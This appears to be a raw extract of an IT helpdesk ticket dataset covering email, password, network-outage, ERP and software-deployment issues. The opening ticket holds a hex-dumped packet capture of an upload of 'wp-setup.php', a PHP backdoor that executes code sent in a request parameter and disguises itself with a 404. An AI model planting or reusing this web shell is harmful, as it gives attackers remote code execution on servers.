0000c0 656e 742d 4c65 6e67 7468 3a20 3239 370d ent-length:.297._x000D_
0000d0 0a41 6363 6570 742d 456e 636f 6469 6e67 .accept-encoding_x000D_
0000e0 3a20 677a 6970 2c20 6465 666c 6174 650d :.gzip,.deflate._x000D_
0000f0 0a41 6363 6570 743a 202a 2f2a 0d0a 5573 .accept:.*/*..us_x000D_
000100 6572 2SID_29 6765 6e74 3a20 4d6f 7a69 6c6c er-agent:.mozill_x000D_
000110 612f 352e 3020 2857 696e 646f 7773 204e a/5.0.(windows.n_x000D_
000120 5420 362e 313b 2072 763a 3334 2e30 2920 t.6.1;.rv:34.0)._x000D_
000130 4765 636b 6f2f 3230 3130 3031 3031 2046 gecko/31211212.f_x000D_
000140 6972 6566 6f78 2f33 342e 300d 0a43 6f6e irefox/34.0..con_x000D_
000150 6e65 6374 696f 6e3a 206b 6565 702d 616c nection:.keep-al_x000D_
000160 6976 650d 0a43 6f6e 7465 6e74 2d54 7970 ive..content-typ_x000D_
000170 653a 206d 756c 7469 7061 7274 2f66 6f72 e:.multipart/for_x000D_
000180 6d2d 6461 7461 3b20 626f 756e 6461 7279 m-data;.boundary_x000D_
000190 3d62 6137 3333 3661 3437 6631 3634 3864 =ba7336a47f1648d_x000D_
0001a0 6339 3235 3565 6235 3935 3130 6536 6630 c9255eb59510e6f0_x000D_
0001b0 320d 0a0d 0a2d 2d62 6137 3333 3661 3437 2....--ba7336a47_x000D_
0001c0 6631 3634 3864 6339 3235 3565 6235 3935 f1648dc9255eb595_x000D_
0001d0 3130 6536 6630 320d 0a43 6f6e 7465 6e74 10e6f02..content_x000D_
0001e0 2d44 6973 706f 7369 7469 6f6e 3a20 666f -disposition:.fo_x000D_
0001f0 726d 2d64 6174 613b 206e 616d 653d 2266 rm-data;.name="f_x000D_
000200 696c 6522 3b20 6669 6c65 6e61 6d65 3d22 ile";.filename="_x000D_
000210 7770 2d73 6574 7570 2e70 6870 220d 0a43 wp-setup.php"..c_x000D_
000220 6f6e 7465 6e74 2d54 7970 653a 2074 6578 ontent-type:.tex_x000D_
000230 742f 706c 6169 6e0d 0a0d 0a3c 3f70 6870 t/plain....&lt;?php_x000D_
000240 2069 6620 2821 6973 7365 7428 245f 5245 .if.(!isset($_re_x000D_
000250 5155 4553 545b 2765 3531 6527 5d29 2920 quest['e51e']))._x000D_
000260 6865 6164 6572 2822 4854 5450 2f31 2e30 header("http/1.0_x000D_
000270 2034 3034 204e 6f74 2046 6f75 6e64 2229 .404.not.found")_x000D_
000280 3b20 4070 7265 675f 7265 706c 6163 6528 ;.@preg_replace(_x000D_
000290 272f 282e 2a29 2f65 272c 2040 245f 5245 '/(.*)/e',.@$_re_x000D_
0002a0 5155 4553 545b 2765 3531 6527 5d2c 2027 quest['e51e'],.'_x000D_
0002b0 2729 3b20 3f3e 0d0a 2d2d 6261 3733 3336 ');.?&gt;..--ba7336_x000D_
0002c0 6134 3766 3136 3438 6463 3932 3535 6562 a47f1648dc9255eb_x000D_
0002d0 3539 3531 3065 3666 3032 2d2d 0d0a 59510e6f02--.._x000D_
==pcap 1 hex e==</t>
  </si>
  <si>
    <t xml:space="preserve">unable to connect to network printer dv06 </t>
  </si>
  <si>
    <t>need access to exchange server on new company iphone</t>
  </si>
  <si>
    <t xml:space="preserve">i am being blocked from exchange activesync and need access to it.  i just received a new company i6._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>strzxuav ojhtmkyq</t>
  </si>
  <si>
    <t>HostName_480 - verify filesystem h:</t>
  </si>
  <si>
    <t xml:space="preserve">dsw in31864001_x000D_
_x000D_
event id: 67771149_x000D_
event summary: [hw] filesystem near capacity - h:_x000D_
source ip: 39.48.23.356_x000D_
destination ip: _x000D_
device ip: 39.48.23.356_x000D_
device name: 39.48.23.356_x000D_
event extra data:_x000D_
inspectorruleid = 878981_x000D_
vendorclassification = none_x000D_
sherlockruleid = 566361_x000D_
logformat = mswineventlog_x000D_
windowseventid = 2013_x000D_
srchostname = HostName_480_x000D_
ctainstanceid = 0_x000D_
username = n/a_x000D_
vendorpriority = 1_x000D_
logsource = system_x000D_
hostname = HostName_480.company.company.com_x000D_
type = warning_x000D_
inspectoreventid = 529254549_x000D_
ileatdatacenter = true_x000D_
ontologystring = ms-system-srv-2013_x000D_
foreseemaliciouscomment = null or empty model found_x000D_
foreseeinternalip = 39.48.23.356_x000D_
group = mswineventlog_x000D_
logtimestamp = 2562437122_x000D_
agentid = 113550_x000D_
foreseeconndirection = internal_x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: vetkdblx.nsuwkraj@gmail.com
daghyunny,
i had sent deployment notification last week with the target list. deployment was scheduled at 10:00 am in the morning, please find the attached email copy for your reference.
if you would have had any concerns in </t>
  </si>
  <si>
    <t>vetkdblx nsuwkraj</t>
  </si>
  <si>
    <t>tastatur an r246 und r247 defekt.</t>
  </si>
  <si>
    <t>tastatur an r246 und r247 defekt. bitte austauschen. (einzelne tasten funktionieren nicht mehr)</t>
  </si>
  <si>
    <t xml:space="preserve">dsw ticket in33417637_x000D_
_x000D_
we are seeing your 80.71.06.702/company-european-asa.company.com-1 device generating a high volume of 'repeat outbound connection for 135/tcp' alerts for traffic (blocked) from edml8111119/10.16.143.221 to port 135/tcp (remote procedure call (rpc)) of external host 31.199.53.9.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t>
  </si>
  <si>
    <t>event summary: [hw] service icmp/icmp is down</t>
  </si>
  <si>
    <t>dsw ticket in33426117_x000D_
_x000D_
event id: 80657337_x000D_
event summary: [hw] service icmp/icmp is down_x000D_
source ip: 10.44.86.12_x000D_
source hostname: ap-f5_x000D_
destination hostname: _x000D_
device ip: 10.44.86.12_x000D_
device name: ap-f5.company.com_x000D_
event extra data:_x000D_
inspectorruleid = 2132464_x000D_
sherlockruleid = 566281_x000D_
ileatdatacenter = true_x000D_
srchostname = ap-f5_x000D_
foreseemaliciouscomment = null or empty model found;evaluationmodels-&gt;808333:0.5001:0.0061|ngm:0.9619:0.0008;_x000D_
foreseeinternalip = 10.44.86.12_x000D_
irreceivedtime = 1469623856316_x000D_
foreseeconndirection = internal_x000D_
inspectoreventid = 860011815_x000D_
_x000D_
_x000D_
occurrence count: 1_x000D_
event count: 1_x000D_
_x000D_
event detail:_x000D_
from 46.45.62.5144 for device 10.44.86.12 summary: service icmp/icmp is down_x000D_
detail: service check failed! (100% failures)_x000D_
(icmp-echo) unable to ping 10.44.86.12</t>
  </si>
  <si>
    <t>abended job in job_scheduler: Job_1953b</t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
 abended job in job_scheduler: Job_1953b at 08/16/16 12:26:27</t>
  </si>
  <si>
    <t>dsw ticket in33575214_x000D_
_x000D_
related events: _x000D_
event id: 91538192_x000D_
event summary: [hw] service icmp/icmp is down_x000D_
occurrence count: 2_x000D_
event count: 1_x000D_
_x000D_
host and connection information_x000D_
source ip: 23.43.93.645_x000D_
source hostname: HostName_67_x000D_
connection directionality: internal_x000D_
_x000D_
device information_x000D_
device ip: 23.43.93.645_x000D_
device name: HostName_67.company.company.com_x000D_
_x000D_
scwx event processing information_x000D_
sherlock rule id (sle): 566281_x000D_
inspector rule id: 2132464_x000D_
inspector event id: 877864930_x000D_
_x000D_
event detail:_x000D_
from 46.45.62.5144 for device 23.43.93.645 summary: service icmp/icmp is down_x000D_
detail: service check failed! (100% failures)_x000D_
(icmp-echo) unable to ping 23.43.93.645</t>
  </si>
  <si>
    <t>dsw ticket number in33575471_x000D_
_x000D_
related events: _x000D_
event id: 91530190_x000D_
event summary: [hw] service icmp/icmp is down_x000D_
occurrence count: 2_x000D_
event count: 1_x000D_
_x000D_
host and connection information_x000D_
source ip: 32.23.28.792_x000D_
source hostname: HostName_68_x000D_
connection directionality: internal_x000D_
_x000D_
device information_x000D_
device ip: 32.23.28.792_x000D_
device name: HostName_68.company.company.com_x000D_
_x000D_
scwx event processing information_x000D_
sherlock rule id (sle): 566281_x000D_
inspector rule id: 2132464_x000D_
inspector event id: 877874632_x000D_
_x000D_
event detail:_x000D_
from 46.45.62.5144 for device 32.23.28.792 summary: service icmp/icmp is down_x000D_
detail: service check failed! (100% failures)_x000D_
(icmp-echo) unable to ping 32.23.28.792</t>
  </si>
  <si>
    <t>HostName_68 near capacity - 90%</t>
  </si>
  <si>
    <t>dsw ticket in33575516_x000D_
_x000D_
 related events: _x000D_
event id: 91530665_x000D_
event summary: [hw] filesystem near capacity - h:_x000D_
occurrence count: 1_x000D_
event count: 1_x000D_
_x000D_
host and connection information_x000D_
source ip: 32.23.28.792_x000D_
source hostname: HostName_68_x000D_
connection directionality: internal_x000D_
_x000D_
device information_x000D_
device ip: 32.23.28.792_x000D_
device name: HostName_68.company.company.com_x000D_
log time: 2016-08-11 at 21:48:46 utc_x000D_
vendor classification: none_x000D_
vendor priority: 1_x000D_
windows event id: 2013_x000D_
type: warning_x000D_
username: n/a_x000D_
_x000D_
scwx event processing information_x000D_
sherlock rule id (sle): 566279_x000D_
inspector rule id: 2132464_x000D_
inspector event id: 877876913_x000D_
agent id: 107317_x000D_
_x000D_
event detail:_x000D_
note: by default, this alert is generated when capacity reaches 90%. (_x000D_
aug 11 21:48:46 32.23.28.792 mswineventlog 1 system 1103 thu aug 11 21:48:46 2016 2013 srv n/a n/a warning HostName_68.company.company.com none  the h: disk is at or near capacity.  you may need to delete some files. 173</t>
  </si>
  <si>
    <t xml:space="preserve">
summary:sound not working on pc</t>
  </si>
  <si>
    <t xml:space="preserve">sep encryption set up </t>
  </si>
  <si>
    <t>need to change the drive name of the network drives.</t>
  </si>
  <si>
    <t>system performance issue</t>
  </si>
  <si>
    <t>ugobadiz rizhbwmc</t>
  </si>
  <si>
    <t>company email accounts</t>
  </si>
  <si>
    <t xml:space="preserve">from: tzrekwqf homwadbs [mailto:horst.zihrtyud@de.ibm.com] _x000D_
sent: tuesday, august 16, 2016 6:04 pm_x000D_
to: nwfodmhc exurcwkm_x000D_
subject: amar fw: company email accounts_x000D_
_x000D_
dear support team,_x000D_
_x000D_
i get my company e-mail adress today for the rpo project betwenn company and ibm._x000D_
_x000D_
cesvpmor.azgtrbow@gmail.com_x000D_
_x000D_
it was a mis-typing. my last name is "zihrtyud". can you change this please?_x000D_
_x000D_
many </t>
  </si>
  <si>
    <t>network outage: russia - warehouse  network is down since 10:50am et on 08/16/16</t>
  </si>
  <si>
    <t>what type of outage:  __x___network     _____circuit     _____power (please specify what type of outage)_x000D_
_x000D_
1. top 23 cert site   ?    ____no_____     (yes/no/na) _x000D_
_x000D_
2. when did it start  ?   ________10:50am et on 08/16/16______________x000D_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___na_____     (yes/no/na) _x000D_
_x000D_
7. site contact notified (phone/email) ?  ____no_____     (yes/no/na) _x000D_
_x000D_
8. remote dial-in ?   ______na_____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</si>
  <si>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account to locked </t>
  </si>
  <si>
    <t>hexsotbv wuzrqvfc</t>
  </si>
  <si>
    <t>unable to access ess</t>
  </si>
  <si>
    <t>nuqwmejc tosypckj</t>
  </si>
  <si>
    <t>multiple issues with the company guest wifi sponsor portal</t>
  </si>
  <si>
    <t xml:space="preserve">we have some consultants from ca technologies visiting this week and i used the following website to provide them access to the companyguest wifi network:_x000D_
_x000D_
_x000D_
i see a certificate error for this site in ie and chrome. (see attached screenshot)_x000D_
_x000D_
i ignored the error and logged in to create a couple of accounts yesterday._x000D_
given that account credentials are limited to a max of 1 day, i went in today and tried to "edit" the accounts to change the date for today._x000D_
everything looked okay in the web app but users were not able to login._x000D_
_x000D_
i even tried to reset the password for one of the users but that didn't help either._x000D_
_x000D_
it is cumbersome to re-type the same info and create new accounts for each day._x000D_
it would be great if the certificate issues are taken care of and accounts could be created for multiple days( or it is easier to renew passwords)_x000D_
</t>
  </si>
  <si>
    <t>my hana will not load anymore</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: nkthumgf.mwgdenbs@gmail.com
hi,
when i try to open hana now i get the follow error.  please help.
[cid:image001.png@01d1f7aa.b16c2290]
nkthumgf mwgdenbs
nkthumgf.mwgdenbs@gmail.com&lt;mailto:nkthumgf.mwgdenbs@gmail.com&gt;
ph
</t>
  </si>
  <si>
    <t>crm mobile app queries</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: wqfzjycu.omleknjd@gmail.com_x000D_
_x000D_
hi deeghyupak,_x000D_
_x000D_
it seems that there has been a lack of knowledge regarding this deployment of telephony_software in israel._x000D_
_x000D_
from the very beginning all our users apart from rabin have been working with the software in hebrew._x000D_
_x000D_
also i am not sure deployment on telephony_software pc's all at the same time should occur in the middle of the working day._x000D_
_x000D_
please let us know when you have a hebrew version available and then we can discuss the deployment._x000D_
_x000D_
many </t>
  </si>
  <si>
    <t>network outage: vogelfontein,south africa,sa primary circuit company_zaf_vogelfontein_mpls_ce01 is down since 10:5am et on 08/16</t>
  </si>
  <si>
    <t>what type of outage:  _____network     __x___circuit     _____power (please specify what type of outage)_x000D_
_x000D_
1. top 23 cert site   ?    ____no_____     (yes/no/na) _x000D_
_x000D_
2. when did it start  ?   ________10:5am et on 08/16______________x000D_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___no______     (yes/no/na) _x000D_
_x000D_
8. remote dial-in ?   ____na_______   (yes/no/na) _x000D_
_x000D_
9. equipment reset ?    ____na_______    (yes/no/na) _x000D_
_x000D_
10. verified site working on backup circuit ?  ___yes____     (yes/no/na) _x000D_
_x000D_
11. vendor ticket  # ( global_telecom_1, verizon, telecom_vendor_1, telecom_vendor_2 )    ______global_telecom_1#000000220624227 ___________________       _x000D_
_x000D_
12. notified  gsc  ________     (yes/no/na)    cert started  ?________    (yes/no/na) _x000D_
_x000D_
13.  additional diagnostics</t>
  </si>
  <si>
    <t>tahbzpsl zgoqstkv</t>
  </si>
  <si>
    <t>engineering tool not work correctly and affect multiple user for pre process area</t>
  </si>
  <si>
    <t>engineering tool not work correctly and affect multiple user for pre process area_x000D_
at the moment is not possible make/review cam programdntys / visualize the dwgs to make the routings and bom's and we needs review some cam files to shop floor and those issues causing stop production_x000D_
the system work sometimes and other is not possible to connect_x000D_
users affected = navarcm / collemc / geronca / furlaf / pintog</t>
  </si>
  <si>
    <t>outlook client issue.</t>
  </si>
  <si>
    <t xml:space="preserve">
summary:receiving following message.
cannot start microsoft outlook. cannot open the outlook window. the set of folders cannot be opened. the information store could not be opened..... have "restared" computer several times, same result. help please</t>
  </si>
  <si>
    <t>when working in outlook, i cannot edite the subject line of an email.  i have been able to do this until today.</t>
  </si>
  <si>
    <t>when working in outlook, i cannot edit the subject line of an email.  i have been able to do this until today.</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: vetkdblx.nsuwkraj@gmail.com_x000D_
_x000D_
hi daghyunny,_x000D_
_x000D_
there was no issue with respect to new telephony_software application and it was deployed successfully through patching_antivirus_sw. deployment was scheduled based on the os language, which in this case was english._x000D_
since we were not supporting hebrew language in the past, we deployed english language telephony_software 2016 r2 in israel pcs._x000D_
csr team in israel had raised a concern that they can't work without hebrew language pack as confirmed by aofnvyzt eqiyskhm. same english package of new telephony_software application is deployed successfully for the aofnvyzt eqiyskhm and he is able to work without any issues. dyxrpmwo hcljzivn  local it from poland uninstalled new version of telephony_software and installed old telephony_software 4.0 on their pcs without informing us._x000D_
_x000D_
to fulfill local csr team requirement we can reschedule the new telephony_software application through remote deployment and hebrew language pack can be installed manually on their pcs._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>wvdxnkhf jirecvta has issues to connect company wifi network in fÃ¼rth</t>
  </si>
  <si>
    <t xml:space="preserve">wvdxnkhf jirecvta has issues to connect company wifi network in fÃ¼rth, and in the past two days his windows access gets suddenly locked. could someone please get in contact with him per cell phone +44 
</t>
  </si>
  <si>
    <t>system (SID_34, SID_37, SID_39, SID_38, hrp, other ?):SID_34
enter user id of user having the issue: kowfthyuale
transaction code(s) the user needs or was working with: vl02n
describe the issue:
during pgi goods receipt eva is getting an error. iÂ´m attaching the su53 screenshot. the sales order was manually moved to plant_263.
if you are getting a "not authorized" message, recreate the condition then do   /nsu53   and attach result to the ticketing_tool ticket.
provide access the same as this other user:</t>
  </si>
  <si>
    <t>erp SID_34 lock out.</t>
  </si>
  <si>
    <t>szpilhug hrwacxbk</t>
  </si>
  <si>
    <t xml:space="preserve">skype personal certificate issue </t>
  </si>
  <si>
    <t>erp SID_37 account unlock and password reset</t>
  </si>
  <si>
    <t>connecting drives to my computer</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: zxobmreq.udikorhv@gmail.com_x000D_
_x000D_
it,_x000D_
connecting drives to my computer is done by it, or is there a function to connect that you can do yourself?_x000D_
_x000D_
ierfgayt alwjivqg needs drive â€“ teams (\\HostName_847&lt;file:///\\HostName_847&gt;) (s:) connection._x000D_
</t>
  </si>
  <si>
    <t>circuit outage: usa - (company) secondary circuit company-usa-vpn-rtr is down since 9:15 am et on 08/16/16</t>
  </si>
  <si>
    <t>what type of outage:  _____network     ___x__circuit     _____power (please specify what type of outage)_x000D_
_x000D_
1. top 23 cert site   ?    ____yes_____     (yes/no/na) _x000D_
_x000D_
2. when did it start  ?   _________9:15 am et on 08/16/16_____________x000D_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____no_____     (yes/no/na) _x000D_
_x000D_
8. remote dial-in ?   ____na_______   (yes/no/na) _x000D_
_x000D_
9. equipment reset ?    _____no______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</si>
  <si>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engineering_tool</t>
  </si>
  <si>
    <t>name:obanjrhg rnafleys
language:
browser:microsoft internet explorer
email:obanjrhg.rnafleys@gmail.com
customer number:
telephone:+44 
summary:access to the engineering_tool system</t>
  </si>
  <si>
    <t>abended job in job_scheduler: SID_32hotf</t>
  </si>
  <si>
    <t xml:space="preserve">from: microsoft outlook [mailto:postmaster@company.onmicrosoft.com] _x000D_
sent: monday, august 15, 2016 7:51 pm_x000D_
to: vhzxkjet lkufgrhq_x000D_
subject: notification: fw: outstanding inwarehouse_tool payment_x000D_
_x000D_
this message was sent to the company quarantine database. please contact company it help desk for more information. _x000D_
</t>
  </si>
  <si>
    <t>vhzxkjet lkufgrhq</t>
  </si>
  <si>
    <t>unable to connect to companysecure at usa, oh</t>
  </si>
  <si>
    <t>contact # 
no one at the site is able to connect to companysecure</t>
  </si>
  <si>
    <t>zcxfngeq gwczibrq</t>
  </si>
  <si>
    <t>not possible to complete to do pgi for rma 7112500109- del 9168048239- td - erro cost center</t>
  </si>
  <si>
    <t xml:space="preserve">during the pgi transaction for rma 7112500109 -  delivery  9168048239 - customer 81295213 ( robhyertyjo tadeu)  and 7112500108 - delivery 9168017962- customer 81295213 ( robhyertyjo tadeu)   we are facing error - cost center 1company/par001 blocked against direct postings on 16.08.2016 / cost center par001, controlling area 1company is locked for primary postings on 16.08.2016. the erp system automatically determined controlling area 1company from the company code (and business area). _x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">issues with attachments on outlook </t>
  </si>
  <si>
    <t>seygxbva shqjbzpf</t>
  </si>
  <si>
    <t>wnyeczkb.eqpjcukv@gmail.com password reset</t>
  </si>
  <si>
    <t>vpn queries</t>
  </si>
  <si>
    <t>fgejnhux fnkymoht</t>
  </si>
  <si>
    <t xml:space="preserve">
summary:job transfer back into markhtyeting and i am requesting access to the engineering_tool (tool performance reporting) system.</t>
  </si>
  <si>
    <t>call transferred to dan</t>
  </si>
  <si>
    <t>unable to connect to the hp printer at home</t>
  </si>
  <si>
    <t>need access to benefit solver in single sign on portal</t>
  </si>
  <si>
    <t>user called in stating that she needs the benefit solver app in single sign on portal.
checked in ad and didn't find that particular group added to user id. please help check and do the needful.
contact no - 
user id - reddfgymos</t>
  </si>
  <si>
    <t>mabstwkd ytmuwicv</t>
  </si>
  <si>
    <t xml:space="preserve">browser issue : </t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
</t>
  </si>
  <si>
    <t>vip 2 - single sign on for hr_tool is not operating</t>
  </si>
  <si>
    <t xml:space="preserve">i cannot access hr_tool globalview for my pay check each time i go to the sso i get this message when i open the hr_tool icon_x000D_
"sorry, your access is denied.  please contact your system administrator."_x000D_
</t>
  </si>
  <si>
    <t>install ie11 \ahlqgjwx wbsfavhg</t>
  </si>
  <si>
    <t>probleme mit lan  \wxstfouy isjzcotm</t>
  </si>
  <si>
    <t>please provide the following:_x000D_
_x000D_
what order number? 1135584771/000020 + 5018821007/00001 + 5018981964/00001_x000D_
_x000D_
what material or item number?  3730375 + 7316410_x000D_
_x000D_
what warehouse location? plant_108_x000D_
_x000D_
issue description / error message? nothing happens - no message</t>
  </si>
  <si>
    <t>after upgrade telephony_software has dierppeared from the screen</t>
  </si>
  <si>
    <t>zkgfcyvx sgxeatyb</t>
  </si>
  <si>
    <t>access to forecast to plan</t>
  </si>
  <si>
    <t>probleme mit Ã¶ffnen von dokumenten im intranet mit internet explorer . \xmlbfjpg yegzbvru</t>
  </si>
  <si>
    <t>single sign on portal apps</t>
  </si>
  <si>
    <t xml:space="preserve">please add the purchasing production and purchasing uacyltoe hxgaycze app to qiyujevw ogadikxv's single sign on portal. she is unable to view and enter purchasing this way. she is a member of purchasing and should have access to it. </t>
  </si>
  <si>
    <t>zqordbct lnspykfu</t>
  </si>
  <si>
    <t xml:space="preserve">company guest account creation request </t>
  </si>
  <si>
    <t xml:space="preserve">
summary:can you please help me with the company guest wifi logon info?</t>
  </si>
  <si>
    <t>fegczbtq mkraueci</t>
  </si>
  <si>
    <t>problems with accessing quote engine within company centre</t>
  </si>
  <si>
    <t>i logged onto to company centre_x000D_
then searched for a part#_x000D_
then clicked on the configure button_x000D_
this would normally start the quote engine_x000D_
_x000D_
instead, receiving the following error (attached)</t>
  </si>
  <si>
    <t>unable to update password on password_management_tool password manager</t>
  </si>
  <si>
    <t>erp pw is invalid</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: qnzmjxsl.logsrwnb@gmail.com_x000D_
_x000D_
dear all,_x000D_
pls. give me authority to reset my erp pw.  </t>
  </si>
  <si>
    <t>qnzmjxsl logsrwnb</t>
  </si>
  <si>
    <t>unable to generate inwarehouse_tool as per delivery# 8057901657</t>
  </si>
  <si>
    <t xml:space="preserve">unable to generate inwarehouse_tool as per delivery# 9168012768, we've got the error message ie. bapi_po_create fail: material auto extend failed, please help fix this error and advise back to us.  then, we will generate tax inwarehouse_tool at our end, </t>
  </si>
  <si>
    <t>HostName_1045:(reporting_engineering_tooling - production): drive e is 88% full.</t>
  </si>
  <si>
    <t>reporting_tool alert: average (4 samples) disk free on e:\ is now 12%, which is below the warning threshold (15%) out of total size 350.0 gb</t>
  </si>
  <si>
    <t xml:space="preserve">erp SID_34 account lock out issue </t>
  </si>
  <si>
    <t>phone issues</t>
  </si>
  <si>
    <t>bitte um ein ruckruf</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: zkgfcyvx.sgxeatyb@gmail.com
 danke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[#+company/posts&gt;  [
select the following link to view the disclaimer in an alternate language. </t>
  </si>
  <si>
    <t>outlook is giving stack guard error.</t>
  </si>
  <si>
    <t>the excel files generated by zsSID_5800 don't open on mobile devices of sales employees</t>
  </si>
  <si>
    <t>see email attached for more details and contacts. check if the excel version or such can be adjusted or if there is an oss note._x000D_
worse case we have to "push" mobile uers to use the reporting_tool version of open orders however opening the excel file is most likely more convenient for them.</t>
  </si>
  <si>
    <t>berechtigung zeitwirtschaft av</t>
  </si>
  <si>
    <t xml:space="preserve">hallo herr busse,_x000D_
_x000D_
wÃ¼rden sie dies bitte via ticket an die it schicken bzw. an _x000D_
_x000D_
help@company.com_x000D_
_x000D_
_x000D_
_x000D_
mit freundlichen grÃ¼ÃŸen / best </t>
  </si>
  <si>
    <t>company-eu-deu-germany-e-b2-f2-press-buero-3550-access-sw01 switch is down since 6:25am on 08/16/16</t>
  </si>
  <si>
    <t>lean tracker error</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: fdmobjul.oicarvqt@gmail.com_x000D_
_x000D_
i am unable to add lean event in to collaboration_platform lean tracker ,  getting below error message._x000D_
request  you to resolve._x000D_
_x000D_
[cid:image001.jpg@01d1f7d9.0f9dd1a0]_x000D_
_x000D_
_x000D_
best </t>
  </si>
  <si>
    <t>user id locked.</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: utoegyqx.lhosidqg@gmail.com
please note , ess portal access for the below specified detail is locked again.
employee name: raghu mg
employee id: 299678542.
user name: mgr.
the issue with this user id is it getting locked again and again.
previously also we were facing the same issue, then the user id and password has been changed and it had worked for few months.
now the issue has occurred again.
the employee is getting error message : user authentication failed.
seek support to resolve the issue.
</t>
  </si>
  <si>
    <t>telephony_software_2016r2_installation - upgrade - does not work after two restarts -  there is no application! empw8111340 a: /nt</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: zjcsqtdn.jikyworg@gmail.com_x000D_
_x000D_
mit freundlichen grÃ¼ÃŸen / with best </t>
  </si>
  <si>
    <t>zjcsqtdn jikyworg</t>
  </si>
  <si>
    <t xml:space="preserve">receiving server error in crm _ adoption score card </t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: qklrdoba.qxivmbts@gmail.com_x000D_
_x000D_
hello,_x000D_
                please find below the snap of the error which i am receiving, while accessing the adoption scorecard :_x000D_
_x000D_
[cid:image001.jpg@01d1f7d3.7f7e2a70]_x000D_
_x000D_
please do the needful._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: wqfzjycu.omleknjd@gmail.com_x000D_
_x000D_
hi deeghyupak,_x000D_
_x000D_
re our phone call just now please can you stop immediately the update for telephony_software our pc's are unable to run telephony_software after the update._x000D_
_x000D_
please see your list below_x000D_
_x000D_
aghl8325615_x000D_
_x000D_
 israel_x000D_
_x000D_
israel_x000D_
_x000D_
nazarr_x000D_
_x000D_
windows 7 professional_x000D_
_x000D_
ic user applications_x000D_
_x000D_
english_x000D_
_x000D_
aghw8325419_x000D_
_x000D_
 israel_x000D_
_x000D_
israel_x000D_
_x000D_
israey_x000D_
_x000D_
windows 7 professional_x000D_
_x000D_
ic user applications (64-bit)_x000D_
_x000D_
english_x000D_
_x000D_
aghw8325488_x000D_
_x000D_
 israel_x000D_
_x000D_
israel_x000D_
_x000D_
nahumo_x000D_
_x000D_
windows 7 professional_x000D_
_x000D_
ic user applications (64-bit)_x000D_
_x000D_
english_x000D_
_x000D_
aghw8325491_x000D_
_x000D_
 israel_x000D_
_x000D_
israel_x000D_
_x000D_
tevkia_x000D_
_x000D_
windows 7 professional_x000D_
_x000D_
ic user applications_x000D_
_x000D_
english_x000D_
_x000D_
aghw8325639_x000D_
_x000D_
 israel_x000D_
_x000D_
israel_x000D_
_x000D_
pogredrty_x000D_
_x000D_
windows 7 professional_x000D_
_x000D_
ic user applications_x000D_
_x000D_
english_x000D_
_x000D_
_x000D_
these are the affected pc's with issues._x000D_
_x000D_
many </t>
  </si>
  <si>
    <t xml:space="preserve">attendance_tool password reset request </t>
  </si>
  <si>
    <t>pstlrmvf jokbeqnp</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: vetkdblx.nsuwkraj@gmail.com_x000D_
_x000D_
hi daghyunny,_x000D_
_x000D_
please find the below pcs which are installed with old telephony_software applications, when we pulled report from patching_antivirus_sw._x000D_
_x000D_
name_x000D_
_x000D_
location_x000D_
_x000D_
country_x000D_
_x000D_
user_x000D_
_x000D_
os name_x000D_
_x000D_
name_x000D_
_x000D_
install primary language_x000D_
_x000D_
os architecture_x000D_
_x000D_
deployment_x000D_
_x000D_
aghl8325615_x000D_
_x000D_
 israel_x000D_
_x000D_
israel_x000D_
_x000D_
nazarr_x000D_
_x000D_
windows 7 professional_x000D_
_x000D_
ic user applications_x000D_
_x000D_
english_x000D_
_x000D_
32-bit_x000D_
_x000D_
patching_antivirus_sw_x000D_
_x000D_
aghw8325419_x000D_
_x000D_
 israel_x000D_
_x000D_
israel_x000D_
_x000D_
israey_x000D_
_x000D_
windows 7 professional_x000D_
_x000D_
ic user applications (64-bit)_x000D_
_x000D_
english_x000D_
_x000D_
64-bit_x000D_
_x000D_
patching_antivirus_sw_x000D_
_x000D_
aghw8325488_x000D_
_x000D_
 israel_x000D_
_x000D_
israel_x000D_
_x000D_
nahumo_x000D_
_x000D_
windows 7 professional_x000D_
_x000D_
ic user applications (64-bit)_x000D_
_x000D_
english_x000D_
_x000D_
64-bit_x000D_
_x000D_
patching_antivirus_sw_x000D_
_x000D_
aghw8325491_x000D_
_x000D_
 israel_x000D_
_x000D_
israel_x000D_
_x000D_
tevkia_x000D_
_x000D_
windows 7 professional_x000D_
_x000D_
ic user applications_x000D_
_x000D_
english_x000D_
_x000D_
32-bit_x000D_
_x000D_
patching_antivirus_sw_x000D_
_x000D_
aghw8325639_x000D_
_x000D_
 israel_x000D_
_x000D_
israel_x000D_
_x000D_
pogredrty_x000D_
_x000D_
windows 7 professional_x000D_
_x000D_
ic user applications_x000D_
_x000D_
english_x000D_
_x000D_
32-bit_x000D_
_x000D_
patching_antivirus_sw_x000D_
_x000D_
agvw8325504_x000D_
_x000D_
_x000D_
_x000D_
israel_x000D_
_x000D_
sokdelfgty_x000D_
_x000D_
windows 7 professional_x000D_
_x000D_
ic user applications_x000D_
_x000D_
english_x000D_
_x000D_
32-bit_x000D_
_x000D_
patching_antivirus_sw_x000D_
_x000D_
_x000D_
we have scheduled the new version upgrade for the pcs which are installed with old telephony_software application._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>new order--mm# 2694571 dmhpm045 / mm# 2695539  mb033</t>
  </si>
  <si>
    <t xml:space="preserve">from: crysyhtal xithya _x000D_
sent: tuesday, august 16, 2016 1:13 pm_x000D_
to: nwfodmhc exurcwkm_x000D_
cc: cindy wanrtyg; marftgytin xia_x000D_
